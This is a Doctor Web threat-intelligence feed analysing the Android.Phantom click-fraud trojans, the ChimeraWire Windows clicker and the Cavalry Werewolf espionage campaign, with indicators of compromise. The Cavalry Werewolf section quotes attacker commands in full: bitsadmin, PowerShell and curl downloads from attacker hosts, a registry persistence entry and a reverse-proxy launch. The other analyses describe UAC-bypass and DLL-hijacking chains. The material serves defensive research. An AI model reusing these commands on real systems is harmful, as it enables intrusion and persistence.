Real-time threat news

Android.Phantom trojans are bundled with modded games and popular apps to infiltrate smartphones. They use machine learning and video broadcasts to engage in click fraud

Wed, 21 Jan 2026 05:00:00 GMT

January 21, 2025

Experts at the Doctor Web antivirus laboratory have discovered and investigated a new trojan clicker malware family. All of these trojans either are administered via the hxxps[:]//dllpgd[.]click server or get downloaded and launched after the corresponding instruction is received from the remote host. Malware belonging to this family infects Android smartphones.

Xiaomi’s GetApps software catalogue is one of its principal distribution channels.

We have been able to identify multiple games that contain the trojans. They include: Creation Magic World (over 32k downloads), Cute Pet House (over 34k downloads), Amazing Unicorn Party (over 13k downloads), Sakura Dream Academy (over 4k downloads), Theft Auto Mafia (more than 61k downloads), and Open World Gangsters (over 11k downloads). All of the compromised games appear to have been uploaded by a single developer—SHENZHEN RUIREN NETWORK CO., LTD. The trojans are bundled with the apps and start alongside them.

It is also worth mentioning that the original versions of the above-listed titles contained no malicious code. On September 28-29, the developer rolled out game updates that contained the Android.Phantom.2.origin trojan. This malicious program can operate in two modes that are designated in its code as the signalling and phantom modes.

In phantom mode, the malware uses its hidden WebView widget to load web content. Upon receiving a corresponding command from the server hxxps[:]//playstations[.]click, it loads a click fraud target site and downloads a JavaScript file named “phantom”. The file incorporates an automation script for interacting with ads on the site as well as the TensorFlowJS machine learning framework. The framework model is downloaded to the app’s directory from the server hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com. To work with certain types of ads, Android.Phantom.2.origin outputs the content to a virtual screen and takes screenshots. The trojan will then use TensorFlowJS routines to analyse them and tap on the identified relevant elements.

In signalling mode, the trojan employs WebRTC to connect to a third-party server. This technology enables browsers and other apps to establish peer-to-peer connections and exchange data, audio, and video in real time with no additional software needing to be installed. When the signalling mode is enabled, the previously mentioned server hxxps[:]//dllpgd[.]click acts as a central server to help the WebRTC nodes find each other. This server also determines whether the trojan should run in phantom or signalling mode. Tasks related to targeted sites are provided by hxxps[:]//playstations[.]click. Then Android.Phantom.2.origin covertly transmits to the perpetrators a video showing a loaded website on a virtual screen. The trojan allows the connected WebRTC peer to remotely control the browser on the virtual screen: tap, scroll, and enter or paste text into the input form.

On October 15-16, yet another update was released for the above-mentioned games. In addition to Android.Phantom.2.origin, they delivered the Android.Phantom.5 module. It is a dropper that retrieves Android.Phantom.4.origin from other remote hosts. This malicious program downloads several other click-fraud trojans to operate on various sites. These modules feature a simpler design compared to Android.Phantom.2.origin—they're not enhanced with machine learning and streaming features but rely on pre-defined click-fraud routines in JavaScript.

To use WebRTC, the trojan requires the Java API, which is not shipped with Android by default and normally doesn't get downloaded with apps. That’s why at first, the trojan mostly ran in phantom mode. However, once Android.Phantom.5 had been introduced into the apps, Android.Phantom.2.origin was further enhanced with the Android.Phantom.4.origin dropper that delivered the API library it required.

Attackers also use other distribution channels to spread Android.Phantom.2.origin and Android.Phantom.5. For example, Spotify app mods with premium features unlocked are made available on various sites and in Telegram channels, including:

Spotify Plus

Spotify Pro

Telegram channels:

Spotify Pro
(54,400 subscribers)

Spotify Plus – Official
(15,057 subscribers)

The altered Spotify app that perpetrators offer on the websites and in the Telegram channels is bundled with Android.Phantom.2.origin and the WebRTC library.

In addition to the Spotify app mods, attackers also incorporate trojans into modified apps for other popular streaming services, including YouTube, Deezer, Netflix and more. These are usually available on portals offering modded APK files:

Apkmody

Moddroid

The Moddroid portal features the “Editor's Choice” section. Only 4 of the editor’s 20 picks proved to be malware-free. The remaining 16 contained Android.Phantom trojans. The apps found on these two sites are loaded from the same CDN server at hxxps[:]//cdn[.]topmongo[.]com. These catalogues are also available as Telegram channels where users download modified APK files containing trojans:

Moddroid.com
(87,653 subscribers)

Apkmody Chat
(6,297 subscribers)

Criminals also use Discord servers to promote and spread the infected apps. Spotify X is the most popular one. It has about 24,000 subscribers.

Its administrators don't shy away from offering compromised APK files to users in a more direct fashion. For example, the screenshot above shows how an administrator is offering visitors a Deezer music streaming app for download instead of a Spotify application, since the latter has stopped working.

The download link will provide the user with a program that actually works. Its code is protected with a proprietary packer concealing Android.Phantom.1.origin. Upon receiving an instruction from hxxps[:]//dllpgd[.]click will download the now well familiar Android.Phantom.2.origin, Android.Phantom.5, and the spyware trojan Android.Phantom.5.origin. The latter relays to the attackers information about the device—including the phone number, location, and a list of the installed apps.

This screenshot of the server shows what languages the impacted users speak. To access chat rooms in languages other than English, they have to react to the appropriate flag. Users who spoke Spanish, French, German, Polish and Italian appeared to be in the majority (English, which appears to be the server’s default language, is not factored in). Furthermore, the server administrators didn’t set up chat rooms for many Asian countries.

These trojans can inflict severe damage to the owners of infected devices. Here are just a few of the possible adverse consequences:

An unsuspecting accomplice. A user's smartphone can be commandeered to partake in a DDoS attack and, by doing so, get its owner unwittingly involved in a cybercrime.
Illegal activity. Attackers can use a compromised device to conduct illegal activities: run online fraud schemes or send spam messages.
Increased battery use and traffic. Covert activities drain the battery and increase mobile data usage.
Personal data leaks. Android.Phantom.5.origin is spyware that will transmit information about the device and its owner to a third party.

Trojans of this strain pose a threat to Android device owners who don't use up-to-date antivirus software. Sometimes users experience availability issues involving foreign online services, which forces them to seek out and use alternative and often shady methods to circumvent restrictions. This situation plays into the hands of virus makers as users are more likely to take chances and put their faith in dubious techniques. Children are particularly vulnerable. In their drive to play videogames, listen to music or watch videos, they tend to completely disregard information security basics.

We strongly advise you against downloading modified APK files from dubious sites and Telegram channels. As a rule, verifying the sources of such mods or apps takes time and requires some experience. That’s why using Dr.Web Security Space is probably the best way to ensure that you and your loved ones enjoy a worry-free experience with your mobile devices. Dr.Web protects not only smartphones but also game consoles, tablets and smart TVs.

Indicators of compromise
More about Android.Phantom.1.origin
More about Android.Phantom.2.origin
More about Android.Phantom.3
More about Android.Phantom.4.origin
More about Android.Phantom.5
More about Android.Phantom.5.origin

Bellerophon could never have imagined. The ChimeraWire trojan boosts website popularity by skillfully pretending to be human

Mon, 08 Dec 2025 05:00:00 GMT

Download PDF

December 8, 2025

Introduction

While analyzing one of the affiliate programs, Doctor Web’s experts discovered a unique piece of malware with clicker functionality and dubbed it Trojan.ChimeraWire. This malware targets computers running Microsoft Windows and is based on the open-source projects zlsgo and Rod for automated website and web application management.

Trojan.ChimeraWire allows cybercriminals to simulate user actions and boost the behavioral factor of websites by artificially increasing their rankings in search engine results. For this, the malicious app searches target Internet resources in the Google and Bing search engines and then loads them. It also imitates user actions by clicking links on the loaded sites. The trojan performs all malicious actions in the Google Chrome web browser, which it downloads from a certain domain and then launches it in debug mode over the WebSocket protocol.

Trojan.ChimeraWire gets onto computers with the help of several malicious downloaders. They utilize various privilege escalation techniques based on exploiting DLL Search Order Hijacking vulnerabilities, as well as anti-debugging techniques, in order to avoid detection. Our anti-virus laboratory has tracked at least 2 infection chains involving these malicious programs. In one of them, the malicious script Python.Downloader.208 takes center stage. In the other—the centerpiece is Trojan.DownLoader48.61444, whose operating principle is similar to that of Python.Downloader.208; in fact, this downloader is an alternative to the malicious script.

In this study, we will cover the features of Trojan.ChimeraWire and the malicious apps that deliver it to users’ devices.

First infection chain

A scheme that illustrates the first infection chain

The first infection chain starts with Trojan.DownLoader48.54600. This malware verifies whether it is operating in an artificial environment and terminates if it detects signs of a virtual machine or the debug mode. If no such signs exist, the trojan downloads the ZIP archive python3.zip from the C2 server. It contains the malicious script Python.Downloader.208 along with some additional files that it needs to operate, e.g., the malicious library ISCSIEXE.dll (Trojan.Starter.8377). Trojan.DownLoader48.54600 extracts the archive and runs the script. The latter is the second infection stage and represents the downloader that receives the next stage from the C2 server.

Python.Downloader.208’s behavior depends on the rights it has when executed. If the script is running without administrator privileges, it tries to obtain them. For this, Trojan.Starter.8377 (extracted along with it) is copied to the directory %LOCALAPPDATA%\Microsoft\WindowsApps. Moreover, a script runs.vbs is created that will later be used to re-launch Python.Downloader.208.

Next, Python.Downloader.208 launches the system app %SystemRoot%\SysWOW64\iscsicpl.exe. Because a DLL Search Order Hijacking class vulnerability is present in it, it automatically loads the trojan library ISCSIEXE.dll, whose name matches the name of a legitimate Windows component.

In turn, Trojan.Starter.8377 runs the VBS script runs.vbs, which then executes Python.Downloader.208 again, but already as administrator.

When executed with the necessary privileges, Python.Downloader.208 downloads the password-protected archive onedrive.zip from the C2 server. It contains the next infection stage, which is the Trojan.DownLoader48.54318 (it comes as the library UpdateRingSettings.dll), and the additional files required for it to operate (for instance, the legitimate app OneDrivePatcher.exe, which is part of the OneDrive software from the Windows OS and has a valid digital signature).

After extracting the archive, Python.Downloader.208 creates a System Scheduler task for running the app OneDrivePatcher.exe at system boot. Next, it launches this program. Because it has a DLL Search Order Hijacking vulnerability, the app automatically loads the malicious library UpdateRingSettings.dll, whose name matches the name of the OneDrive software component.

Once Trojan.DownLoader48.54318 gains control, it checks whether it has launched in an artificial environment. If it detects any sign that it is operating on a virtual machine or in debug mode, it terminates.

If such signs are not detected, the trojan library tries to download the payload from the C2 server as well as the keys for its decryption.

The decrypted payload is a ZLIB container with a shellcode and an executable file. After decrypting the container, Trojan.DownLoader48.54318 tries to unpack it. If it fails to do so, the trojan deletes itself and terminates its active process. If the unpacking is successful, control is handed to the shellcode, whose task is to unzip the executable that comes with it. This file represents the final infection stage, which is the target trojan Trojan.ChimeraWire.

Second infection chain

The second stage starts with the Trojan.DownLoader48.61444 malware. When launched, it verifies whether it has administrator rights and tries to obtain them if they are missing. The trojan uses the Masquerade PEB technique to bypass the security system, disguising itself as a legitimate process explorer.exe.

Next, it patches the copy of the system library %SystemRoot%\System32\ATL.dll. To do so, Trojan.DownLoader48.61444 reads its contents, adds a decrypted bytecode to it along with the path to the trojan’s file, and then saves the modified copy as the file dropper in the same directory where it is located. After that, the trojan initializes the COM model objects of the Windows Shell for the service %SystemRoot%\System32\wbem and the modified library. If this initialization is successful, Trojan.DownLoader48.61444 tries to obtain administrator rights by using the CMSTPLUA COM interface, exploiting a vulnerability that is typical for some old COM interfaces.

If successful, the modified library dropper is copied to the directory %SystemRoot%\System32\wbem as the file ATL.dll. After that, Trojan.DownLoader48.61444 launches the Windows Management Instrumentation WmiMgmt.msc. As a result, a DLL Search Order Hijacking vulnerability is exploited in the system app mmc.exe, and it automatically loads the patched library%SystemRoot%\System32\wbem\ATL.dll. In turn, this library launches the Trojan.DownLoader48.61444 again, but this time—with administrator rights.

A scheme illustrating Trojan.DownLoader48.61444’s operation when administrator rights are not available

When running as administrator, Trojan.DownLoader48.61444 executes several PowerShell scripts for downloading the payload from the C2 server. One of the downloading objects is the ZIP archive one.zip. It contains the same files as in the archive onedrive.zip from the first infection chain (particularly, the legitimate app OneDrivePatcher.exe and the malicious library UpdateRingSettings.dll, which is Trojan.DownLoader48.54318).

Trojan.DownLoader48.61444 extracts the archive and creates a System Scheduler task for running OneDrivePatcher.exe at system boot. The trojan also launches this app. Just like in the first chain, a DLL Search Order Hijacking vulnerability is exploited in OneDrivePatcher.exe upon its launch, and the trojan library UpdateRingSettings.dll is automatically loaded. After that, the infection chain repeats the first scenario.

At the same time, Trojan.DownLoader48.61444 also downloads the second ZIP archive two.zip. It contains the malicious script Python.Downloader.208 (update.py) as well as the files necessary for its execution. Among them is Guardian.exe, which is a renamed pythonw.exe consol interpreter for the Python language.

After extracting the archive, Trojan.DownLoader48.61444 creates a System Scheduler task for launching Guardian.exe at system boot. Moreover, it directly executes the malicious script Python.Downloader.208 through this app.

By partially duplicating the first infection chain, threat actors apparently sought to increase the likelihood of successfully downloading Trojan.ChimeraWire onto target systems.

A scheme illustrating Trojan.DownLoader48.61444 operating with administrator rights

Trojan.ChimeraWire

Trojan.ChimeraWire got its name from combining the words “chimera”—a mythical creature with the body parts of several animals—and “wire”. The word "chimera” describes the hybrid nature of the attackers’ techniques: the use of trojan downloaders written in different programming languages as well as anti-debugging techniques and privilege escalation during the infection process. Moreover, it reflects the fact that the trojan is a combination of various frameworks, plugins, and legal software through which hidden traffic control is carried out. And this is where the second word “wire” comes from: it refers to the trojan’s invisible and malicious network operation.

Once on the target computer, Trojan.ChimeraWire downloads the archive chrome-win.zip from a third-party website. This archive contains the Google Chrome browser for Windows. It should be noted that this Internet resource also stores archives containing Google Chrome builds for other operating systems, like Linux and macOS, including those for various hardware platforms.

The website with various Google Chrome builds from which the trojan downloads the necessary archive

When the browser is downloaded, Trojan.ChimeraWire tries to covertly install the add-ons NopeCHA and Buster into it. Designed for automated CAPTCHA solving, these add-ons will be used by the malware further along in its operation.

Next, it launches the browser in the debugging mode with a hidden window, which allows malicious activity to occur without the user noticing. After that, a connection is established to the automatically selected debugging port via the WebSocket protocol.

The trojan then proceeds to obtain tasks. It sends a request to the C2 server and receives a base64 string in response. This string contains the JSON configuration encrypted with the AES-GCM algorithm.

Example of the configuration that the trojan receives from the C2 server

It contains tasks and the parameters related to them:

the target search engine (the Google and Bing search platforms are supported);
the key phrases for searching websites in the target search engine and for their consequent loading;
the maximum number of sequential transitions between webpages;
random distributions for performing automated clicks on webpages;
the wait time for loading pages;
the target domains.

To more effectively simulate the activity of a real user and bypass systems that monitor constant activity, the configuration also includes parameters responsible for pauses between work sessions.

Simulating user mouse clicks

Trojan.ChimeraWire can perform the following types of clicks:

for navigating search results;
for opening found relevant links in new background tabs.

First, using the target search engine, Trojan.ChimeraWire searches websites by the domains and key phrases specified in the configuration. It then opens the websites listed in the search results and locates every HTML element on them that defines hyperlinks. The trojan puts these elements into a data array and shuffles it so that all of the objects in it are listed in a different order than the order on the webpage. This is to bypass website anti-bot protection that can track the order of clicks.

Next, Trojan.ChimeraWire checks whether the links it has found and the strings in them match the template from the configuration, and then calculates the number of matches. Depending on this number, the malware then uses different operating algorithms.

If a sufficient number of suitable links is found on the page, Trojan.ChimeraWire scans the page and sorts the detected links by their relevance (the links that most closely match key phrases are listed first). After that, a click is performed on one or multiple suitable links.

If the number of matches with the given template are insufficient or none exist, the malware uses a probabilistic behavior model algorithm that imitates real human behavior as closely as possible. Based on the parameters from the configuration, Trojan.ChimeraWire uses a weighted distribution to determine the number of links to be opened. For example, the distribution ["1:90", "2:10"] means that the trojan will click 1 link with a probability of 90% and 2 links with a probability of 20%. Thus, the malware is highly likely to open 1 link. The trojan randomly selects the link from the data array it created earlier and performs a click.

Every time the trojan opens a link from the search results and performs clicks on the loaded webpage, it either returns to the previous browser tab or proceeds to the next one, depending on the task. These actions are repeated until the click limit for the target websites is exhausted.

Below are examples of websites that the trojan was commanded to interact with in tasks received from the C2 server:

For detailed technical descriptions of the ChimeraWire trojan and the malware involved in its download, please refer to the PDF version of the study or visit the Doctor Web virus library.

More details about Trojan.ChimeraWire
More details about Trojan.DownLoader48.54600
More details about Trojan.Starter.8377
More details about Python.Downloader.208
More details about Trojan.DownLoader48.54318
More details about Trojan.DownLoader48.61444

Conclusion

As of now, Trojan.ChimeraWire's malicious activity essentially boils down to performing relatively simple clicker tasks to boost the popularity of websites. At the same time, the functionality of the tools that the trojan is based on allows it to perform a wider range of tasks, including automated actions under the guise of real user activity. For instance, malicious actors can utilize it to fill out web forms on various sites, including those conducting surveys for advertising purposes. In addition, they can use the trojan for reading the contents of webpages and taking screenshots of them — both for the purposes of cyber espionage and for automated data collection to build various databases (e.g., with emails, phone numbers, etc.).

Thus, we can expect new Trojan.ChimeraWire versions to emerge in the future, in which these and other features will be fully implemented. Doctor Web’s specialists continue to monitor the trojan’s evolution.

MITRE ATT&CK®

We analyzed Trojan.ChimeraWire using the MITRE ATT&CK® framework, a matrix describing the tactics and techniques that cybercriminals utilize to attack information systems. The following key techniques were identified:

Stage	Technique
Execution	User Execution (T1204) Malicious File (T1204.002) Malicious Library (T1204.005) PowerShell (T1059.001) Windows Command Shell (T1059.003) Visual Basic (T1059.005) Python (T1059.006) Scheduled Task (T1053.005)
Persistence	Registry Run Keys / Startup Folder (T1547.001) Scheduled Task/Job (T1053)
Privilege Escalation	Hijack Execution Flow: DLL (T1574.001) Bypass User Account Control (T1548.002)
Defense Evasion	Encrypted/Encoded File (T1027.013) Debugger Evasion (T1622) Hidden Window (T1564.003) File/Path Exclusions (T1564.012) Deobfuscate/Decode Files or Information (T1140) Hijack Execution Flow: DLL (T1574.001)
Command and Control	Bidirectional Communication (T1102.002) Web Protocols (T1071.001)

Indicators of compromise

Cavalry Werewolf hacker group attacks Russian state institutions

Thu, 06 Nov 2025 00:00:00 GMT

Download PDF

November 6, 2025

Introduction

In July 2025, Doctor Web was contacted by a client from a government-owned organization within the Russian Federation with suspicions that its internal network had been compromised. This hypothesis derived from the fact that spam emails were detected as coming from one of their corporate email addresses. An investigation into the incident, conducted by our anti-virus laboratory, revealed that the institution had been subjected to a targeted attack by a hacker group, which our experts identified as Cavalry Werewolf. One of the attack’s goals was to collect confidential information as well as network configuration data.

During the examination, our experts successfully identified previously unknown malware, including open-source tools. Among them were various backdoors that allow commands to be executed remotely on attacked systems and the background to be prepared for reconnaissance and further anchoring into the network infrastructure.

In this study, we will discuss the Cavalry Werewolf tools that we discovered and consider the features of this hacker group and the typical actions that these cybercriminals perform in compromised networks.

General information about the attack and the tools involved

To gain initial access to one of the computers, the threat actors utilized a common attack vector: phishing emails with malware disguised as documents attached. In this particular case, the messages contained BackDoor.ShellNET.1, a backdoor that was unknown at the time of the attack. This malware is based on Reverse-Shell-CS open-source software. It allows infected systems to be connected to remotely via a reverse shell and commands to be executed. This backdoor was located in a password-protected archive and had different names, depending on the particular phishing campaign involved.

Name variants for BackDoor.ShellNET.1
Службеная записка от 16.06.2025___________________________.exe
О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe
О проведении личного приема граждан список участников.exe
О работе почтового сервера план и проведенная работа.exe

An example of a phishing email containing BackDoor.ShellNET.1. The attackers offer the potential victim a “document” to read and provide a password that can be used to unpack the archive

Using BackDoor.ShellNET.1, the threat actors continued to get anchored into the target system. They downloaded several malicious apps through the standard Windows tool Bitsadmin (C:\Windows\SysWOW64\bitsadmin.exe)—for managing file transfer tasks. This program was launched with a set of certain command-line keys and on behalf of the current system administrator, as shown in the example below:

cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe

The first threat downloaded with BackDoor.ShellNET.1 was the Trojan.FileSpyNET.5 trojan stealer. The cybercriminals used it to download documents stored on the computer in .doc, .docx, .xlsx, and .pdf formats; text files (.txt); and images (.jpg, .png).

Next, the attackers installed BackDoor.Tunnel.41 (backdoor malware that is ReverseSocks5 open-source software) to create SOCKS5 tunnels and inconspicuously connect to the computer in order to then execute commands on it, including one permitting the installation of other malware.

Cavalry Werewolf tools

Our investigation into this incident allowed us to uncover not only the aforementioned malware, but also many other of this criminal group’s tools that hackers use to carry out targeted attacks. It should be noted that Cavalry Werewolf malware creators do not limit themselves to a single set of malicious apps and are constantly expanding their arsenal. For this reason, the tools for penetrating target systems can vary, as can the next stages in the infection chain, depending on which institution is being attacked.

The entry point

Malicious programs in Cavalry Werewolf’s phishing emails are the first stage in the infection chain. At the same time, they can be represented by different malware types. Doctor Web’s virus analysts identified the following variants:

scripts (BAT.DownLoader.1138);
executable files (Trojan.Packed2.49708, Trojan.Siggen31.54011, BackDoor.Siggen2.5463, BackDoor.RShell.169, BackDoor.ReverseShell.10).

BAT.DownLoader.1138

This is a batch file that downloads PowerShell.BackDoor.109, PowerShell backdoor malware, into the target system. With its help, the threat actors download and run other malware on the computer.

Known file names for BAT.DownLoader.1138	SHA1 hash	С2 server
scan26_08_2025.bat	d2106c8dfd0c681c27483a21cc72d746b2e5c18c	168[.]100.10[.]73

Trojan.Packed2.49708

This trojan installs the BackDoor.Spy.4033 malware that is stored in encrypted form in its body. This backdoor allows the attackers to execute commands in the infected system via a reverse shell.

Known file names for Trojan.Packed2.49708	SHA1 hash	С2 server
О проведении личного приема граждан список участников план и проведенная работа.exe C:\Windows\2o1nzu.exe	5684972ded765b0b08b290c85c8fac8ed3fea273	185[.]173.37[.]67
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe	29ee3910d05e248cfb3ff62bd2e85e9c76db44a5	185[.]231.155[.]111
О работе почтового сервера план и проведенная работа.exe Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe План-протокол встречи о сотрудничестве представителей должн.лиц.exe	ce4912e5cd46fae58916c9ed49459c9232955302	109[.]172.85[.]95
C:\Windows\746wljxfs.exe	653ffc8c3ec85c6210a416b92d828a28b2353c17	185[.]173.37[.]67
—	b52e1c9484ab694720dc62d501deca2aa922a078	109[.]172.85[.]95

Trojan.Siggen31.54011

This trojan installs the BackDoor.Spy.4038 malware that is stored in encrypted form in its body. This backdoor allows the attackers to execute commands in the infected system via a reverse shell.

Functionality-wise, Trojan.Siggen31.54011 is similar to the Trojan.Packed2.49708 malware, but it has a slightly different payload-extraction algorithm.

SHA1 hash	С2 server
baab225a50502a156222fcc234a87c09bc2b1647	109[.]172.85[.]63
93000d43d5c54b07b52efbdad3012e232bdb49cc	109[.]172.85[.]63

BackDoor.Siggen2.5463

This backdoor executes tasks received from the attackers and is controlled via a Telegram bot. The main functionality of this malware is located in the PowerShell code hidden in its body.

Known file names for BackDoor.Siggen2.5463	SHA1 hash	The payload
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe system.exe	c96beb026dc871256e86eca01e1f5ba2247a0df6	PowerShell.BackDoor.108

BackDoor.RShell.169

This backdoor allows malicious actors to remotely connect to infected computers via a reverse shell to execute various commands.

Known file names for BackDoor.RShell.169	SHA1 hash	С2 server
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe	633885f16ef1e848a2e057169ab45d363f3f8c57	109[.]172.85[.]63

BackDoor.ReverseShell.10

This backdoor enables a reverse shell and gives threat actors remote access to the system.

Known file names for BackDoor.ReverseShell.10	SHA1 hash	С2 server
к проектам.exe Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe	dd98dcf6807a7281e102307d61c71b7954b93032	195[.]2.78[.]133
Служебная записка от 20.08.2025 .exe Служебная записка от 12.08.2025 .exe	f546861adc7c8ca88e3b302d274e6fffb63de9b0	62[.]113.114[.]209

The next infection stages

We have uncovered the following malicious programs that can be installed on infected devices after they have been compromised:

Trojan.Inject5.57968

This is a trojan app with a backdoor encrypted in its body. This backdoor allows the attackers to download malicious programs on the infected computer. The payload is decrypted in several steps. In one of them, a malicious data array is injected into the process of the aspnet_compiler.exe program, which is part of the Microsoft .NET Framework package. Eventually, the completely decrypted backdoor operates in the context of this legitimate app’s process.

Studying Trojan.Inject5.57968’s activity, using the “sandbox” of the Dr.Web vxCube interactive threat analyzer

Known file names for Trojan.Inject5.57968	SHA1 hash	С2 server	The payload
pickmum1.exe	e840c521ec436915da71eb9b0cfd56990f4e53e5	64[.]95.11[.]202	Trojan.PackedNET.3351
mummyfile1.exe	22641dea0dbe58e71f93615c208610f79d661228	64[.]95.11[.]202	Trojan.PackedNET.3351

BackDoor.ShellNET.2

A backdoor that is controlled via a Telegram bot and executes the attackers’ commands.

Known file names for BackDoor.ShellNET.2	SHA1 hash
win.exe	1957fb36537df5d1a29fb7383bc7cde00cd88c77

BackDoor.ReverseProxy.1

A backdoor based on the ReverseSocks5 open-source software. It enables a SOCKS5 proxy in the infected system to provide remote access to the computer. BackDoor.ReverseProxy.1 is launched via the command interpreter cmd.exe with the parameter -connect IP to connect to the target address. There are modifications of this backdoor with hardcoded addresses.

The following IPs have been detected:

78[.]128.112[.]209 (specified in the launching command)
96[.]9.125[.]168 (specified in the launching command)
188[.]127.231[.]136 (hardcoded in the code)

Known file names for BackDoor.ReverseProxy.1	SHA1 hash
revv2.exe	6ec8a10a71518563e012f4d24499b12586128c55

Trojan.Packed2.49862

Trojan.Packed2.49862 is the detection name for the trojan versions of legitimate programs in which the attackers have implanted malicious code. Doctor Web’s malware analysts encountered malicious modifications of the WinRar and 7-Zip archivers, the Visual Studio Code development tool, AkelPad text-editing software, and some other apps. Among them, for instance, was the Sumatra PDF Reader program which the cybercriminals passed off as MAX messenger. Such modifications are no longer able to carry out their main functionality and, when launched, can only initialize the implanted trojan component.

Depending on the cybercriminals’ goals, these modifications can carry all sorts of malware. Among them are:

BackDoor.ReverseProxy.1 (ReverseSocks5)
BackDoor.Shell.275 (AdaptixC2)
BackDoor.AdaptixC2.11 (AdaptixC2)
BackDoor.Havoc.16 (Havoc)
BackDoor.Meterpreter.227 (CobaltStrike)
Trojan.Siggen9.56514 (AsyncRAT)
Trojan.Clipper.808

Known file names for Trojan.Packed2.49862	SHA1 hash	С2 server	The payload
code.exe rev2.exe	8279ad4a8ad20bf7bbca0fc54428d6cdc136b776	188[.]127.231[.]136	BackDoor.ReverseProxy.1
code.exe revv.exe	a2326011368d994e99509388cb3dc132d7c2053f	192[.]168.11[.]10	BackDoor.ReverseProxy.1
7zr.exe winload.exe system.exe Recorded_TV.exe	451cfa10538bc572d9fd3d09758eb945ac1b9437	77[.]232.42[.]107	BackDoor.Shell.275
Command line RAR winlock.exe Recorded_TV.exe	a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2	77[.]232.42[.]107	BackDoor.AdaptixC2.11
winsrv.exe firefox.exe	bbe3a5ef79e996d9411c8320b879c5e31369921e	94[.]198.52[.]210	BackDoor.AdaptixC2.11
AkelPad.exe	e8ab26b3141fbb410522b2cbabdc7e00a9a55251	78[.]128.112[.]209	BackDoor.Havoc.16
7z.exe	dcd374105a5542ef5100f6034c805878153b1205	192[.]168.88[.]104	BackDoor.Meterpreter.227
7z.exe	e51a65f50b8bb3abf1b7f2f9217a24acfb3de618	192[.]168.1[.]157	Trojan.Siggen9.56514
7z.exe chromedriver.exe	d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4	Telegram bot	Trojan.Clipper.808
7z 7z.exe svc_host.exe dzveo09ww.exe	c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81	Telegram bot	Trojan.Clipper.808
—	b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5	Telegram bot	Trojan.Clipper.808
max - для бизнеса.exe	b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231	89[.]22.161[.]133	BackDoor.Havoc.16

Typical actions performed by this group in a compromised network

Once the attackers penetrate the target organization’s computer infrastructure, they can perform various actions involving data collection and getting further anchored into the system.

To collect information about the infected computer, they execute these commands:

whoami — to get information about the current user;
dir C:\\users\\<user>\\Downloads — to get the list of files located in the “Downloads” directory of the current user;
dir C:\\users\\public\\pictures\\ — to get the list of files in the “Pictures” directory from a shared catalog (in order to determine which malicious programs have already been downloaded into the system);
ipconfig /all — to get the network configuration;
net user — to get a list of all of the users in the system.

They use the following commands to collect information about the proxy server and to check the network’s functionality:

powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'
curl -I https://google.com
curl -I https://google.com -x <proxy>

To configure the network, they use:

a command-line tool netsh, which is included in the Windows OS.

To subsequently deliver malicious tools into the system, they use legitimate tools:

PowerShell (for example: powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe);
Bitsadmin (for example: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe);
curl (for example: curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe);

To get anchored in the system:

They can modify the Windows registry (for example: REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Service /t REG_SZ /d C:\\users\\public\\pictures\\win.exe /f).

They use the command-line interpreter cmd.exe to launch their tool. For example:

C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443 — to launch BackDoor.ReverseProxy.1;
C:\\users\\public\\pictures\\732.exe — to launch BackDoor.Tunnel.41.

They can use PowerShell to delete their tools. For example:

powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe

Threat actors can also periodically check whether C2 servers are available, using the command ping.

Features of the Cavalry Werewolf hacker group

The following features of the Cavalry Werewolf hacker group can be highlighted:

they prefer using open-source software, both in its original form and as the basis for developing their own tools;
their main tools are various reverse-shell backdoors that allow commands to be executed remotely in infected systems;
they can embed malicious code into initially harmless programs;
they often use the Telegram API to control infected computers;
they use compromised email addresses and carry out phishing campaigns, sending emails under the guise of state institutions to distribute the first infection stage;
they use directories C:\\users\\public\\pictures, C:\\users\\public\\libraries, and C:\\users\\public\\downloads to download subsequent infection stages to the target device.

For detailed technical descriptions of identified Cavalry Werewolf tools, please refer to the PDF version of the study or visit the Doctor Web virus library.

MITRE matrix

Stage	Technique
Initial access	Spearphishing attachment (T1566.001)
Execution	User execution (T1204) PowerShell (T1059.001) Windows Command Shell (T1059.003)
Persistence	Registry Run Keys / Startup Folder (T1547.001) BITS Jobs (T1197)
Privilege Escalation	Bypass User Account Control (T1548.002)
Defense Evasion	BITS Jobs (T1197)
Command and Control	External Proxy (T1090.002) Bidirectional Communication (T1102.002)
Exfiltration	Exfiltration Over C2 Channel (T1041) Exfiltration Over Web Service (T1567)

Indicators of compromise

Understanding the ClickFix attack

Fri, 24 Oct 2025 10:52:52 GMT

Users all over the world are getting increasingly worried as the number of ClickFix security incidents continues to grow at an alarming rate. Attackers are using this social engineering technique to coax users into running malicious code on their devices.

An attack commences when someone winds up on a compromised or bogus site and sees a warning message informing them that, for example, the webpage can't be displayed properly because of a browser error or that an update is required.
